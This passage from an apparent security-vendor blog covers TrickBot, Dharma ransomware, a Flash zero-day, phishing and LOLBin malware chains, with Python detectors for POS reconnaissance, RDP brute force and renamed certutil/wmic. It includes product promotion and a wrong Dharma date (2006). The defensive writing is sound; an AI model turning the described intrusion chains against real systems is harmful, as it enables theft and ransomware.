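2018-12-03T10:06:00 client=10.0.0.7 filter=(&(objectCategory=computer)(dnsHostName=fileserver01*))
"""

LINE = re.compile(r"^(?P<ts>\S+) client=(?P<client>\S+) filter=(?P<filter>.*)$")


def pos_terms_in_filter(ldap_filter):
    """Return the POS-related terms probed by dnsHostName assertions in a filter."""
    hits = set()
    for value in DNSHOST_ASSERTION.findall(ldap_filter):
        # Strip LDAP wildcards; what remains is the substring being searched for.
        needle = value.replace("*", "").lower()
        if needle in POS_TERMS:
            hits.add(needle)
    return hits


def find_pos_recon(log_text, min_terms=3):
    """Map each client to the sorted POS terms it probed, keeping only clients
    that probed at least `min_terms` distinct terms. One lookup for a host
    called *pos* is normal admin activity; a run of one query per keyword from
    the same client is what a scripted sweep looks like."""
    per_client = defaultdict(set)
    for raw in log_text.splitlines():
        m = LINE.match(raw)
        if not m:
            continue  # line does not match the expected layout; skip it
        per_client[m["client"]] |= pos_terms_in_filter(m["filter"])
    return {c: sorted(t) for c, t in per_client.items() if len(t) >= min_terms}


if __name__ == "__main__":
    for client, terms in find_pos_recon(SAMPLE_LOG).items():
        print(f"possible POS reconnaissance from {client}: {terms}")
```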

The timing of the update suggests the threat actors are planning to take advantage of the increase in holiday trade and are gathering as much data as possible before the module is used to collect POS data.

The recent updates to TrickBot malware have been accompanied by a malicious spam email campaign (discovered by Brad Duncan) which is targeting companies in the United States. The malspam campaign uses Word documents including malicious macros that download the TrickBot binary.

Protecting against TrickBot and other data stealing malware requires a defense-in-depth approach to cybersecurity. The main attack vector used by the threat actors behind TrickBot is spam email, so it is vital for an advanced anti-spam solution to be deployed to stop malicious messages from being delivered to end users’ inboxes. End user training is also important to ensure employees are made aware of the danger of opening emails from unknown senders, launching suspicious email attachments, and clicking hyperlinks in those emails.

Antivirus solutions and endpoint security measures should also be deployed to identify and quarantine potentially malicious files in case malware makes it past perimeter security.

New Variant of Dharma Ransomware Discovered

A new Dharma ransomware variant has been created that is currently evading detection by most antivirus engines.

Heimdal Security says that the most recent Dharma ransomware variant captured by its researchers was identified as malware by only one of the 53 AV engines on VirusTotal.

Dharma ransomware (also known as CrySiS) was first seen in 2006 and is still being developed. This year, many new Dharma ransomware variants have been released, each using new file extensions for encrypted files (.bip, .xxxxx, .like, .java, .arrow, .gamma, .arena, .betta, and .tron to name but a few). In the past two months alone four new Dharma ransomware variants have been discovered.

The threat actors behind Dharma ransomware have claimed many victims in recent months. Successful attacks have recently been reported on Altus Baytown Hospital in Texas, the Arran brewery in Scotland, and the port of San Diego.

While free decryptors for Dharma ransomware have been created, the constant evolution of this ransomware threat rapidly renders those decryptors obsolete. Infection with the most recent variants leaves victims with only three options: pay a sizeable ransom to recover files, restore files from backups, or face permanent file loss.

The last of these is not a solution given the number of files that are encrypted. Restoring files from backups is not always an option, as Dharma ransomware can also encrypt backup files and can delete shadow copies. Paying the ransom is not a solution either, as there is no guarantee that files can or will be decrypted.

Safeguarding against ransomware attacks requires a combination of policies, processes, and cybersecurity solutions. Dharma ransomware attacks are mostly carried out via two attack vectors: the exploitation of Remote Desktop Protocol (RDP) and email malspam campaigns.

The most recent Dharma ransomware attacks involve an executable file delivered via a .NET file and an HTA file. Infections occur through RDP-enabled endpoints, using brute force attempts to guess passwords. Once a password is obtained, the malicious payload is executed.

While it is not entirely clear how the Arran brewery attack happened, a phishing attack is suspected. Phishing emails had been received shortly before file encryption. Arran Brewery’s managing director Gerald Michaluk said: “We cannot be 100 percent sure that this was the vector that infection occurred through, but the timing seems to be more than coincidental”.

To safeguard against RDP attacks, RDP should be disabled unless it is absolutely necessary. If RDP is a requirement, access should only be possible through a VPN and strong passwords should be enforced. Rate limiting on login attempts should be configured to block further login attempts after a set number of failures.
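The password-guessing step described above leaves a trail of failed RDP logons, and the rate-limiting rule just recommended can also be run as a detection over those records. The following is an added example, not part of the original article: it applies a threshold inside a sliding window to constructed records modelled on Windows Security event 4625 (failed logon) with logon type 10 (RemoteInteractive, i.e. RDP). The source addresses and account names are constructed.

```python
"""Detect RDP password guessing from failed-logon records.

Added defensive example, not part of the original article. Records are
constructed tuples of (timestamp, event_id, logon_type, account, source_ip)
modelled on the fields of Windows Security event 4625. Only RDP failures
(logon type 10) count; a source that exceeds `threshold` failures inside any
`window` is reported once, together with how many distinct accounts it tried,
which distinguishes password spraying from a user mistyping one password.
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta

RDP_LOGON_TYPE = 10          # RemoteInteractive
FAILED_LOGON_EVENT = 4625

# Constructed sample events for this example.
SAMPLE_EVENTS = [
    ("2018-11-20 02:00:01", 4625, 10, "administrator", "203.0.113.7"),
    ("2018-11-20 02:00:02", 4625, 10, "admin", "203.0.113.7"),
    ("2018-11-20 02:00:02", 4625, 10, "backup", "203.0.113.7"),
    ("2018-11-20 02:00:03", 4625, 10, "user", "203.0.113.7"),
    ("2018-11-20 02:00:04", 4625, 10, "test", "203.0.113.7"),
    ("2018-11-20 02:00:05", 4625, 10, "sqlsvc", "203.0.113.7"),
    ("2018-11-20 08:15:00", 4625, 10, "jdoe", "192.0.2.10"),   # one typo
    ("2018-11-20 09:30:00", 4625, 10, "jdoe", "192.0.2.10"),   # another, 75 min later
    ("2018-11-20 09:30:01", 4625, 2, "svc", "10.0.0.4"),       # interactive logon, not RDP
]


def parse_ts(text):
    return datetime.strptime(text, "%Y-%m-%d %H:%M:%S")


def detect_rdp_bruteforce(events, threshold=5, window=timedelta(minutes=5)):
    """Return {source_ip: (time_of_alert, distinct_accounts_tried)} for every
    source with more than `threshold` RDP logon failures within `window`."""
    recent = defaultdict(deque)    # per source: failure timestamps still inside the window
    accounts = defaultdict(set)    # per source: account names attempted so far
    alerts = {}
    # ISO-style timestamps sort correctly as strings, so order events by time.
    for ts_text, event_id, logon_type, account, src in sorted(events, key=lambda e: e[0]):
        if event_id != FAILED_LOGON_EVENT or logon_type != RDP_LOGON_TYPE:
            continue
        ts = parse_ts(ts_text)
        q = recent[src]
        q.append(ts)
        accounts[src].add(account)
        while q and ts - q[0] > window:    # slide the window forward
            q.popleft()
        if len(q) > threshold and src not in alerts:
            alerts[src] = (ts, len(accounts[src]))
    return alerts


if __name__ == "__main__":
    for src, (when, n_accounts) in detect_rdp_bruteforce(SAMPLE_EVENTS).items():
        print(f"{src}: RDP brute force threshold crossed at {when}, {n_accounts} accounts tried")
```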

Naturally, good backup policies are vital. They ensure that file recovery is possible without paying a ransom. Multiple copies of backups should be made, with one copy held securely off site.

To safeguard against email-based attacks, an advanced spam filter is needed. Spam filters that rely on AV engines may not notice the latest ransomware variants. Advanced analyses of incoming messages are vital.

SpamTitan can enhance protection for businesses through a combination of two AV engines and predictive techniques that block new types of malware whose signatures have not yet been added to AV engines.

For more information on SpamTitan and safeguarding your email gateway from ransomware attacks and other threats, contact TitanHQ’s security experts today.

Flash Player Vulnerability Being Actively Exploited via Spear Phishing Campaign

Adobe has released an unscheduled update to correct vulnerabilities in Adobe Flash Player, including a zero-day flaw that is currently being exploited in the wild by an APT group against targets in Russia. One target was a Russian healthcare center that provides medical and cosmetic surgery services to high level civil servants of the Russian Federation.

The zero-day flaw is a use-after-free weakness – CVE-2018-15982 – which enables arbitrary code execution and privilege escalation in Flash Player. A malicious Flash object executes malicious code on a victim’s computer, which gives command line access to the system.

The vulnerability was discovered by security researchers at Gigamon ATR, who reported it to Adobe on November 29. Researchers at Qihoo 360 discovered a spear phishing campaign that is being used to deliver a malicious document and linked files that exploit the weakness. The document used in the campaign was a forged staff questionnaire.

The emails included a .rar compressed file attachment that contained a Word document, the exploit, and the payload. If the .rar file is unpacked and the document opened, the user is shown a warning that the document may damage the computer. If content is enabled, a malicious command is run which extracts and launches the payload – a Windows executable named backup.exe that is disguised as an NVIDIA Control Panel application. Backup.exe acts as a backdoor into the system. The malicious payload gathers system data, which is sent back to the attackers via HTTP POST. The payload also downloads and runs shellcode on the infected device.

Qihoo 360 researchers have labelled the campaign Operation Poison Needles due to the identified target being a healthcare center. While the attack seems to be politically motivated and highly targeted, now that details of the vulnerability have been made public it is likely that other threat groups will use exploits for the vulnerability in more and more attacks.

It is therefore vital for companies that have Flash Player installed on some of their devices to update to the most recent version of the software as soon as they can. That said, removing Flash Player, if it is not required, is a better option given the number of vulnerabilities that are identified in the software each month.

The vulnerability affects Flash Player 31.0.0.153 and all previous versions. Adobe has addressed the flaw, together with a DLL hijacking vulnerability, in version 32.0.0.101.

Starbucks Porn Filter to Finally be Implemented in 2019

A Starbucks porn filter will be introduced in 2019 to stop adult content from being accessed by customers connected to the chain’s free WiFi network.

It has taken a considerable amount of time for the Starbucks porn filter to be applied. In 2016, the coffee shop chain agreed to put in place a WiFi filtering solution following a campaign from the internet safety advocacy group Enough is Enough, but two years on and a Starbucks porn filter has only been applied in the UK.

Companies Pressured to Put in Place WiFi Filters to Block Porn

Enough is Enough launched its Porn Free WiFi campaign – now renamed the SAFE WiFi campaign – to pressure companies that offer free WiFi to customers to apply WiFi filters that prevent access to adult content. In 2016, over 50,000 petitions were sent to the CEOs of Starbucks and McDonalds urging them to apply WiFi filters and take the lead in preventing access to pornography and child porn on their WiFi networks.

After being petitioned, McDonald’s took swift action and rolled out a WiFi filter across its 14,000 restaurants. Starbucks, however, has been slow to act. After the McDonalds announcement in 2016, Starbucks agreed to roll out a WiFi filter once it had determined how to limit access to unacceptable content without inadvertently blocking unintended content. Until the Starbucks porn filter was applied, the coffee shop chain said it would reserve the right to stop any behavior that negatively impacted the customer experience, including activities on its free WiFi network.

The apparent lack of action led Enough is Enough to increase the pressure on Starbucks. On November 26, 2018, Enough is Enough president and CEO, Donna Rice Hughes, issued a fresh call for a Starbucks porn filter to be put in place and for the coffee chain to follow through on its 2016 promise. Rice Hughes also called on the public to sign a new petition calling for the Starbucks porn filter to finally be put in place.

Starbucks Porn Filter to Be Launched in All Regions in 2019

Starbucks has responded to Enough is Enough, via Business Insider, stating that it has been testing a variety of WiFi filtering solutions and has identified one that meets its needs. The Starbucks porn filter will be released across all its cafes in 2019.

All companies that offer free WiFi to their customers have a responsibility to ensure that their networks cannot be abused and remain ‘family-friendly.’ It is inevitable that some individuals will abuse the free access and flout acceptable use policies. A technical solution is therefore necessary to enforce those policies.

While Enough is Enough is focused on ensuring adult content is blocked, there are other benefits of WiFi filtering. A WiFi filter protects customers from malware downloads and can stop them accessing phishing websites. All manner of egregious and illegal content can be restricted.

WiFi filters can also help companies conserve bandwidth to make sure that all customers can log on to the Internet and enjoy reasonable speeds.

TitanHQ has long been a supporter of WiFi filtering for public WiFi hotspots and has developed WebTitan Cloud for WiFi to allow businesses to easily restrict access to unacceptable and illegal web content on WiFi networks.

WebTitan Cloud for WiFi allows companies to carefully control the content that can be accessed over WiFi without inadvertently blocking unintended content. Being 100% cloud based, no hardware purchases and no software downloads are necessary.

The solution offers companies advanced web filtering capabilities through an easy to use, intuitive user interface. No IT consultants are needed to implement and run the solution. It can be set up and managed by individuals with little to no technical know-how.

The solution is highly scalable and can be used to safeguard thousands of users, at multiple locations around the globe, all managed through a single user interface.

If you run a company that offers free WiFi to customers and you have not yet started controlling the activities that can take place over your WiFi network, contact TitanHQ today for further information on WebTitan Cloud for WiFi.

Managed Service Providers (MSPs) that want to start providing WiFi filtering to their clients can join the TitanHQ Alliance. All TitanHQ solutions have been created to meet the needs of MSPs and make it simple for them to add new security capabilities to their service stacks.

Office 365 Phishing Emails Masquerade as Non-Delivery Notifications

A phishing campaign was recently discovered by ISC Handler Xavier Mertens, and it appears that the campaign is still active.

The phishing emails look like legitimate Office 365 non-delivery notifications and include Office 365 branding. As with official non-delivery alerts, the user is warned that messages have not been delivered and told that action must be taken.

The Office 365 phishing emails claim that “Microsoft found Several Undelivered Messages” and attribute the non-delivery to “Server Congestion.” The emails direct the sender to retype the recipient’s email address and resend the message, although, conveniently, they also provide a Send Again button.

If users click the Send Again button, they are directed to a website that closely resembles the official Office 365 website and includes a login box that has been pre-filled with the user’s email address.

If the password is handed over, a JavaScript function sends both the email address and password to the hacker. The user will then be sent to the actual outlook.office365.com website where they will be shown a real Office 365 login box.

While the Office 365 phishing emails and the website look genuine, there are signs that all is not what it seems. The emails are well composed and the sender’s email – postmaster@us.ibm.com – looks official but there is irregular capitalization of the warning alert: Something that would not be included on an official Microsoft notification.

The most obvious sign that this is a phishing scam is the domain to which users are directed if they click on the Send Again button. It is not an authentic Microsoft domain (agilones.com).

While the mistake in the email may be missed, users should notice the domain, although some users may proceed and enter passwords as the login box is the exact same as the login on the official Microsoft site.

The campaign shows just how vital it is to carefully check every message before taking any action and to always review the domain before disclosing any sensitive data.

Hackers use Office 365 phishing emails because so many companies have signed up to Office 365. Mass email campaigns therefore have a high probability of reaching an Outlook inbox. It is also easy to target Office 365 users specifically: a business that uses Office 365 broadcasts that fact through its public DNS MX records.

Companies can bolster their resilience to phishing attacks through mandatory security awareness training for all staff. Employees should be told to always review messages carefully and should be taught how to spot phishing emails.

Companies should also make sure they have an advanced spam filtering solution in place. While Microsoft does provide anti-phishing protection for Office 365 via its Advanced Threat Protection (ATP) offering, businesses should consider using a third-party spam filtering solution with Office 365.

SpamTitan provides protection against phishing and zero-day attacks, an area where ATP struggles.

Lion Air Spear Phishing Campaign Spreading Cannon Trojan

A new malware variant, labelled the Cannon Trojan, is being used in targeted attacks on government agencies in the United States and Europe. This malware threat has been strongly linked to a threat group known under many names – APT28, Fancy Bear, Sofacy, Sednit, Strontium – that has connections to the Russian government.

The Cannon Trojan is being used to collate data on potential targets, collecting system information and capturing screenshots that are sent back to APT28. The Cannon Trojan is also an installer capable of installing further malware variants onto an impacted system.

This recently detected malware threat is stealthy and uses a mix of tricks to evade detection and hide communications with its C2. Rather than communicating over HTTP/HTTPS, like other malware variants used by APT28, the Cannon Trojan communicates via email over SMTPS and POP3S.

Once installed, the malware sends an email over SMTPS on port 465 and obtains two additional email addresses through which it communicates with its C2 using the POP3S protocol to receive instructions and send back data. While the use of email for communicating with a C2 has been seen before, it is relatively unusual. One benefit of this method of communication is that it is more difficult to identify and block than HTTP/HTTPS.

The Cannon Trojan, like the Zebrocy Trojan which is also being deployed by APT28, is being distributed through spear phishing emails. Two email templates have been intercepted by Palo Alto Networks’ Unit 42 team, one of which takes advantage of interest in news about the Lion Air plane crash in Indonesia.

The Lion Air spear phishing email appears to provide updates on the victims of the crash, which the email claims are detailed in an attached Word document titled Crash List (Lion Air Boeing 737).docx. The user must click Enable Content to see the contents of the document: it is claimed that the document was created in an earlier version of Word and that content must be enabled for the file to be displayed. Opening the attachment and enabling content lets the macro run, which then silently installs the Cannon Trojan.

Instead of the macro running and installing the payload straight away, the attackers use the AutoClose function as an anti-analysis mechanism to defer completion of the macro routine until the document is closed. Only then is the Trojan installed. A sandbox that analyzes the document and exits before closing it would be unlikely to see it as malicious. In addition, the macro will only run if a connection with the C2 is established. Even if the document is opened and content is enabled, the macro will not run without its C2 channel open.

The methods used by the attackers to obfuscate the macro and hide communications make this threat difficult to spot. The key to preventing infection is blocking the threat at source and stopping it from reaching inboxes. Providing end user training to help employees identify threats such as emails with attachments from unknown senders is also crucial.

Germany Cybercrime Losses Estimated to be €43 Billion

With the world’s largest economy, the United States is naturally a major focus for cybercriminals. Various studies have been carried out in relation to the cost of cybercrime in the United States, but little data has been made available on cybercrime losses in Germany – Europe’s largest economy.

The International Monetary Fund releases a list of countries with the largest economies. In 2017, Germany came in fourth place after the United States, China, and Japan. Its GDP of $3.68 trillion accounts for 4.61% of global GDP.

A recently released study carried out by Germany’s federal association for Information Technology – BitKom – has placed a figure on the toll that cybercrime is having on the German economy.

The study surveyed security chiefs and managers at Germany’s top 503 companies in the manufacturing sector. Based on the results of that survey, BitKom calculated cybercrime losses in Germany to be €43 billion ($50.2 billion). That accounts for 1.36% of the country’s GDP.

Extrapolating Germany’s cybercrime figures globally puts the global cost of cybercrime at $1 trillion, substantially higher than the $600 billion estimate from cybersecurity company McAfee and the Center for Strategic and International Studies (CSIS) in February 2018. That study estimated the global percentage of GDP lost to cybercrime at between 0.59% and 0.80%, with GDP losses to cybercrime across Europe calculated to be between 0.79% and 0.89% of GDP.

Small to Medium Sized Businesses Most in Danger

While cyberattacks on large enterprises can be highly profitable for cybercriminals, those firms tend to have the resources available to spend heavily in cybersecurity. Attacks on large enterprises are therefore much more difficult and time consuming. It is far simpler to focus on smaller companies with less robust cybersecurity defenses.

Small to medium sized businesses (SMBs) often do not have the resources to spend heavily on cybersecurity, and consequently are far easier to attack. The BitKom study confirmed that these firms, which form the backbone of the German economy, are particularly susceptible to cyberattacks and have been extensively targeted by cybercriminals.

It is not just organized cybercriminal groups that are running these attacks. Security officials in Germany have long been concerned about attacks by well-financed foreign spy agencies. Those agencies are using cyberattacks to obtain access to the advanced manufacturing techniques created by German firms that give them a competitive advantage. Germany is one of the world’s main manufacturing nations, so it stands to reason that the German firms are an attractive target.

Cybercriminals are stealing money from German firms and selling stolen data on the black market, and nation-state backed hackers are stealing proprietary data and technology to assist manufacturing in their own countries. According to the survey, one third of companies have had mobile phones stolen, and sensitive digital data has gone missing from a quarter of German firms. 11% of German firms report that their communications systems have been tapped.

Attacks are also being used to sabotage German firms. According to the study, almost one in five German firms (19%) have had their IT and production systems infiltrated and impacted through cyberattacks.

Companies Must Enhance Their Defenses Against Cyberattacks

Achim Berg, head of BitKom, recently stated: “With its worldwide market leaders, German industry is particularly interesting for criminals”. Companies, SMBs especially, must take cybersecurity much more seriously and invest commensurately in cybersecurity solutions to stop cybercriminals from gaining access to their systems and data.

Thomas Haldenwang, deputy president of the BfV domestic intelligence agency, stated: “Illegal knowledge and technology transfer … is a mass phenomenon.”

Stopping cyberattacks is not easy. There is no one solution that can safeguard against all attacks. Only defense-in-depth will ensure that cybercriminals and nation-state sponsored hacking groups are stopped from obtaining access to sensitive data.

Companies need to carry out regular, in-depth organization-wide risk analyses to identify all threats to the confidentiality, integrity, and availability of their data and systems. All identified dangers must then be addressed through a robust risk management process and layered defenses put in place to thwart attackers.

One of the chief vectors for attack is email. Figures from Cofense indicate that 91% of all cyberattacks begin with a malicious email. It stands to reason that enhancing email security should be a key priority for German firms. This is an area where TitanHQ can be of assistance.

TitanHQ is a supplier of world-class cybersecurity solutions for SMBs and enterprises that obstruct the most commonly used attack vectors. To discover more about how TitanHQ’s cybersecurity solutions can help to enhance the security posture of your company and block email and web-based attacks, contact the TitanHQ sales team now.

Windows Components Used to Install Banking Trojans in New Office 365 Threat

The attack begins with malspam containing a malicious link embedded in an email. A range of different themes could be used to entice users into clicking the link, although one of the latest campaigns pretends to be emails from the national postal service in Brazil.

The emails claim the postal service tried to send a package, but the delivery failed as there was no one at home. The tracking code for the package is sent in the email and the user is requested to click the link in the email to receive the tracking data.

In this instance, visiting the link results in a popup asking the user to confirm the download of a zip file, which is alleged to contain the tracking data. If the zip file is downloaded, the user is asked to click on a LNK file to view the data. The LNK file runs cmd.exe, which runs a Windows Management Instrumentation (WMI) binary: wmic.exe. This legitimate Windows file is used to communicate with the attacker’s C2 server and creates a copy of another Windows file – certutil.exe – in the %temp% folder under the name certis.exe. A script then runs which instructs certis.exe to connect to a different C2 server to download malicious files.

The focus of this attack is to use legitimate Windows files to install the malicious payload: a banking Trojan. The use of genuine Windows files for communication and downloading files helps the attackers bypass security controls and install the malicious payload unnoticed.

These Windows files can install other files for legitimate purposes, so it is hard for security teams to spot malicious activity. This campaign focuses on users in Brazil, but this Office 365 threat should be a worry for all users as other threat actors have also tried this tactic to install malware.

Due to the difficulty of differentiating between legitimate and malicious wmic.exe and certutil.exe activity, blocking an Office 365 threat such as this is simplest at the initial point of attack: preventing the malicious email from being delivered to an inbox, and providing security awareness training to staff to help them identify this Office 365 threat. The latter is crucial for all businesses. Employees can be turned into a strong last line of defense through security awareness training. The former can be achieved with a spam filtering solution such as SpamTitan. SpamTitan will stop that last line of defense from being tested.
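The chain described above (cmd.exe launching wmic.exe, certutil.exe copied to %temp% as certis.exe) is hard to tell apart from admin activity by process name alone, but endpoint telemetry does carry two signals that survive the rename. The following is an added example, not part of the original article and not TitanHQ's code: it triages constructed records modelled on Sysmon Event ID 1 fields (Image, OriginalFileName, ParentImage, CommandLine). OriginalFileName comes from the binary's version resource, so it still reads CertUtil.exe after the file is copied to certis.exe; the path names and command lines are constructed.

```python
"""Triage process-creation records for the renamed-certutil / cmd->wmic chain.

Added detection example, not part of the original article. Records are
constructed dicts with Sysmon Event ID 1 style fields. Two signals are used:
  * a process whose OriginalFileName names a watched LOLBin but whose on-disk
    file name differs (the copy to certis.exe does not change the PE resource);
  * wmic.exe started directly by cmd.exe, the hop the article describes.
Running from a user temp directory is added as a supporting reason only.
"""
import ntpath

# Constructed sample telemetry for this example.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\cmd.exe", "OriginalFileName": "Cmd.Exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"cmd.exe /c C:\Users\ana\Downloads\rastreamento.lnk"},
    {"Image": r"C:\Windows\System32\wbem\wmic.exe", "OriginalFileName": "wmic.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "wmic.exe [arguments omitted]"},
    {"Image": r"C:\Users\ana\AppData\Local\Temp\certis.exe", "OriginalFileName": "CertUtil.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "certis.exe [arguments omitted]"},
    {"Image": r"C:\Windows\System32\certutil.exe", "OriginalFileName": "CertUtil.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": "certutil.exe -verify server.cer"},          # legitimate use
    {"Image": r"C:\Windows\System32\wbem\wmic.exe", "OriginalFileName": "wmic.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "wmic.exe logicaldisk get size"},            # admin script
]

# LOLBins whose on-disk name should match their version-resource name.
RENAME_WATCHLIST = {"certutil.exe", "wmic.exe"}


def basename(path):
    # ntpath handles Windows separators regardless of the host OS.
    return ntpath.basename(path).lower()


def is_renamed_lolbin(ev):
    """True when a watched binary runs under a different file name."""
    orig = ev.get("OriginalFileName", "").lower()
    return orig in RENAME_WATCHLIST and basename(ev["Image"]) != orig


def is_wmic_from_cmd(ev):
    """True for the cmd.exe -> wmic.exe hop. A hunting signal, not proof:
    tune against your own baseline of admin scripts."""
    return basename(ev["Image"]) == "wmic.exe" and basename(ev["ParentImage"]) == "cmd.exe"


def is_in_user_temp(path):
    return "\\appdata\\local\\temp\\" in path.lower()


def triage(events):
    """Return [(index, [reasons...])] for records that trip at least one
    primary signal; the temp-path reason is appended only alongside one."""
    findings = []
    for i, ev in enumerate(events):
        reasons = []
        if is_renamed_lolbin(ev):
            reasons.append("renamed " + ev["OriginalFileName"].lower())
        if is_wmic_from_cmd(ev):
            reasons.append("wmic spawned by cmd")
        if reasons and is_in_user_temp(ev["Image"]):
            reasons.append("image in user temp directory")
        if reasons:
            findings.append((i, reasons))
    return findings


if __name__ == "__main__":
    for i, reasons in triage(SAMPLE_EVENTS):
        print(f"event {i}: {SAMPLE_EVENTS[i]['Image']} -> {', '.join(reasons)}")
```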

How to Prevent this Office 365 Threat with SpamTitan & Enhance Email Security

Microsoft uses many techniques to identify malspam and stop malicious messages from reaching users’ inboxes; however, while efforts have been made to enhance the effectiveness of Office 365’s spam filtering controls, many malicious messages still get through.

To enhance Office 365 security, a third-party spam filtering solution should be deployed. SpamTitan has been created to allow simple integration into Office 365 and provides superior protection against a wide variety of email threats.

SpamTitan uses a range of methods to stop malspam from being delivered to end users’ inboxes, including predictive techniques to spot threats that are missed by Office 365 security controls. These techniques ensure industry-leading catch rates in excess of 99.9% and stop malicious emails from reaching inboxes.

Security Solutions for MSPs to Prevent Office 365 Threats

Many MSPs resell Office 365 licenses to their clients. Office 365 permits MSPs to capture new business, but the margins are tiny. By offering extra services to improve Office 365 security, MSPs can make their Office 365 offering more desirable to businesses while growing the profitability of Office 365.

TitanHQ has been creating innovative email and web security solutions for over 25 years. Those solutions have been created from the foundations up with MSPs, for MSPs. Three solutions are ideal for use with Office 365 for compliance and to enhance security – SpamTitan email filtering, WebTitan web filtering, and ArcTitan email archiving.

By including these solutions in Office 365 packages, MSPs can supply clients with much greater value while significantly improving the profitability of offering Office 365.

To discover more about each of these solutions, speak to TitanHQ. The MSP team will outline how the products operate, how they can be adapted to your company, and how they can boost margins on Office 365.

ArcTitan Offers Lightning-Fast, Enterprise-Class Microsoft Exchange Email Archiving for your Business

Is your business looking for a lightning-fast, enterprise-class method of email archiving? Nowadays, it is a requirement in business to have an email archiving solution in order to ensure that emails are not lost, emails can be retrieved on demand and storage space is kept to a minimum. Although native Microsoft Exchange email archiving is already available, most businesses will find the archiving options are not up to standard. The only alternative is to adopt a third-party email archiving solution. This will provide all the features required by businesses, as well as improve efficiency and save on cost. In order to improve efficiency and meet the requirements of businesses, TitanHQ developed ArcTitan: a secure, fast, cloud-based email archiving solution.

What Email Archiving is and its Importance

Businesses have been required by federal, state, and industry regulations to retain emails for many years. Often a considerable amount of storage space is taken up through storing emails, especially when you consider the number of emails that are typically sent and received by employees daily. Although it suffices for businesses to store emails in backups to meet legal requirements, backups are not searchable. When a business needs to recover a certain email, it needs to be recovered quickly, which is simply not possible with backups. The solution to this problem is an email archive. In comparison to backups, email archives are searchable and messages can be retrieved quickly and with minimal effort.

Email Archiving Necessary for eDiscovery and GDPR Compliance

An email archiving solution is essential for eDiscovery. There have been a number of cases where, as part of the eDiscovery process, businesses have received heavy fines for failing to produce emails. An example of this can be seen in the Zubulake v. UBS Warburg case, where the plaintiff was awarded $29 million as a result of the failure to produce emails.

In order to comply with GDPR legislation, email archives are now vital. Since May 25, 2018, when the EU’s General Data Protection Regulation came into effect, companies have been required on request to produce (and delete) every element of an individual’s personal data, including personal data contained in emails. This can be incredibly time consuming without an email archive and may result in data being unlawfully retained since backups are not searchable. The fines for GDPR compliance failures can reach as high as €20 million or 4% of global annual revenue, whichever is more substantial.

Native Microsoft Exchange Email Archiving Drawbacks

Native Microsoft Exchange email archiving provides businesses with journaling and personal archive functions, but there are drawbacks to each. While the functions meet some business requirements, such as freeing up space in mailboxes, they lack the full functions of a dedicated archive and do not meet all eDiscovery requirements.

When using native Microsoft Exchange email archiving, end users have too much control over the information that is loaded into an archive and they can’t delete emails unless a legal hold is activated. For admins, retrieving emails can be complicated and extremely time consuming.

With native Microsoft Exchange email archiving, the functions fail to meet the needs of a lot of businesses, particularly those in highly regulated industries. Although the native Microsoft Exchange email archiving functions have improved over the years, the limitations remain in most product versions and archiving can be complex with certain email architectures.

Any business that uses multiple email systems alongside Microsoft Exchange will require a third-party email archiving solution. This is due to Microsoft Exchange not supporting the archiving of emails from other platforms.

There has been an improvement in email archiving with Office 365. SMBs that use Office 365 already have email archiving functionality included in their plans, but it is only free of charge with E3-E5 plans. Additional plans charge around $3 per user, which is more expensive than custom-built archiving solutions such as ArcTitan.

Native Microsoft Exchange email archiving is an option for businesses, but Microsoft Exchange was not developed specifically for email archiving. Despite the improvements Microsoft has made, a third-party solution for email archiving on Microsoft Exchange is still required.

A third-party email archiving solution will make managing your email archiving significantly more efficient. It will save your IT department a considerable amount of time trying to locate old messages, especially for the typical requests that are received which are light on detail. The advanced search options in ArcTitan make search and retrieval of messages much faster and easier.

ArcTitan: Lightning-Fast, Enterprise-Class Email Archiving

ArcTitan has been specifically developed for email archiving, making it more specialised than competing products. ArcTitan has been designed to meet all the archiving needs of businesses and to allow managed service providers to offer email archiving to their clients.

The benefits of ArcTitan include extremely fast email archiving and message retrieval, secure encrypted storage and compliance with industry regulations such as HIPAA, SOX, FINRA, SEC and GDPR. ArcTitan allows businesses to meet eDiscovery requirements without having to pay for additional eDiscovery services from Microsoft. ArcTitan also maintains an accurate audit trail and gives businesses near-instant access to all of their emails. ArcTitan serves as a black box recorder for all email to meet the various eDiscovery requirements and ensures compliance with federal, state, and industry regulations.

ArcTitan Features

ArcTitan requires no hardware or software, is quick and easy to install, and slots into the email architecture of businesses with ease. The solution is highly scalable (there are no limits on storage space or users), it is easy to use, lightning fast and stores all emails safely and securely.

Businesses that have not yet implemented a Microsoft Exchange email archiving solution typically save up to 75% of storage space. Costs are also kept to a minimum with a flexible pay-as-you-go pricing policy, with subscriptions paid per live user.

  • Unlimited cloud based email archiving including inbound/outbound/internal email, folders, calendars and contacts
  • A full data retention and eDiscovery policy
  • HIPAA, SOX (and more) standard compliance and audited access trail
  • SuperFast Search™ – email is compressed, zipped and de-duplicated at message and attachment level, ensuring fast search and retrieval
  • Web console access with multi-tiered and granular access options – You decide user access permissions
  • No hardware / software installation required
  • Works with all email servers including MS Exchange, Zimbra, Notes, SMTP/IMAP/Google/PO
  • Secure transfer from your email server
  • Encrypted storage on AWS cloud
  • Instantly searchable via your browser – You can find archived emails in seconds
  • Maintains a complete audit trail
  • Optional Active Directory integration for seamless Microsoft Windows authentication
  • Optional Outlook email client plugin

If you have not yet implemented an email archiving solution, if you are unhappy with the native Microsoft Exchange email archiving features, or if you are finding your current archiving solution too expensive or difficult to use, contact TitanHQ today to find out more about the benefits of ArcTitan and the improvements it can offer to your business.

California Wildfire Scam Email Warning Issued

A California wildfire scam is underway that asks for donations to help those impacted by the recent wildfires. The emails seem to come from the CEO of a company and are aimed at its staff members in the accounts and finance sections.

It should come as no shock that hackers are taking advantage of yet another natural disaster and are trying to con people into giving donations. Scammers often move swiftly following natural disasters to play on people’s emotions and defraud businesses. Similar scams were carried out in the wake of the recent hurricanes that hit the United States and caused widespread harm.

The California wildfire scam, discovered by Agari, is a business email compromise (BEC) attack. The emails seem to have been sent by the CEO of a company, with his/her email address used to transmit messages to company staff. This is often accomplished by spoofing the email address although in some instances the CEO’s email account has been compromised and is used to broadcast the messages.

